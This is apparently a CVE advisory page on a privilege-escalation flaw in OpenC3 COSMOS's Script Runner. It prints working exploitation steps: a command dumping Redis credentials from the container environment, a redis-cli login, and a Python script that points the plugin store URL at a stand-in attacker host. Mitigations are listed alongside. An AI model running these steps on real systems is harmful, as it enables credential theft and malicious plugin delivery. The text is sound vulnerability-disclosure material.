OpenC3 COSMOS, Execution with Unnecessary Privileges, CVE(NotProvided) (Critical)

Listen to this Post

The vulnerability exists because the Script Runner widget in the `openc3inc/openc3-COSMOS-script-runner-api` Docker image allows authenticated users to execute Python and Ruby scripts. All Docker containers share the same network, so a script can bypass API permission checks. An attacker with script execution permission can read environment variables inside the Script Runner container to obtain Redis credentials (username, password, hostname, port). Using those credentials, a malicious Python script can connect directly to the Redis database (e.g., openc3-redis:6379) and perform unauthorized HSET/HGET operations. For example, the script creates a new Redis hash `openc3__settings_hacked` with key `store_url` and value `http://hacked.com`, effectively changing the plugin store URL. Because Redis holds secrets and settings, and the config bucket stores plugin files, the attacker can read sensitive data, modify COSMOS configuration, and escalate privileges to administrative level. The attack is authenticated remote (requires valid user with script-runner permission) and leverages unnecessary privileges granted to the script-runner API container. Step-by-step: 1) Run Ruby code to extract Redis credentials from container environment. 2) Use Python script with those credentials to issue `r.hset()` and `r.hget()` against Redis. 3) Upload a modified plugin store URL file to the config bucket, redirecting plugin downloads to a malicious server. The vulnerability is critical because it compromises the entire mission control system.

dailycve form:

Platform: Docker containers
Version: All before patch
Vulnerability: Privilege escalation
Severity: Critical
date: 2025-02-15

Prediction: 2025-03-01

What Undercode Say:

Extract Redis credentials from Script Runner container
docker exec openc3-script-runner-api env | grep -E "REDIS|OPENC3_REDIS"
Connect to Redis using discovered credentials
redis-cli -h openc3-redis -p 6379 -a openc3password --user openc3
List all keys
KEYS
Python script to exploit (as shown in )
import redis
import json
import time
r = redis.Redis(
host='openc3-redis',
port=6379,
username='openc3',
password='openc3password',
decode_responses=True
)
Malicious setting
setting_data = {
'name': 'store_url',
'data': 'http://hacked.com',
'updated_at': time.time_ns()
}
r.hset('openc3__settings_hacked', 'store_url', json.dumps(setting_data))
print(r.hget('openc3__settings_hacked', 'store_url'))

How Exploit:

  1. Authenticate to COSMOS as any user with Script Runner permission.
  2. Create a new script containing the Ruby code to dump environment variables, revealing Redis credentials.
  3. Run a Python script (as above) inside the Script Runner container using those credentials to modify Redis keys or overwrite config bucket files.
  4. Change the `store_url` setting to point to attacker-controlled server, causing COSMOS to fetch malicious plugins.
  5. Optionally read any Redis data (secrets, settings) via `redis-cli` or Python.

Protection from this CVE:

  • Restrict Script Runner API permissions: remove unnecessary privileges from the container (run as non-root, drop Linux capabilities).
  • Isolate Docker networks: place Redis and buckets in a separate internal network not accessible by script-runner-api.
  • Use network policies or firewall rules to block script-runner-api from reaching Redis except through the official API gateway.
  • Rotate Redis credentials and store them in secrets manager, not environment variables.
  • Upgrade OpenC3 COSMOS to patched version once released (expected 2025-03-01).

Impact:

  • Data disclosure: Attacker can read all Redis data, including credentials, configuration, and mission logs.
  • Data manipulation: Modify Redis settings, plugin store URLs, and bucket files, leading to supply chain attacks.
  • Privilege escalation: Low-privileged user gains admin-level control over the entire COSMOS system.
  • System compromise: Redirect plugin downloads to malicious server for remote code execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top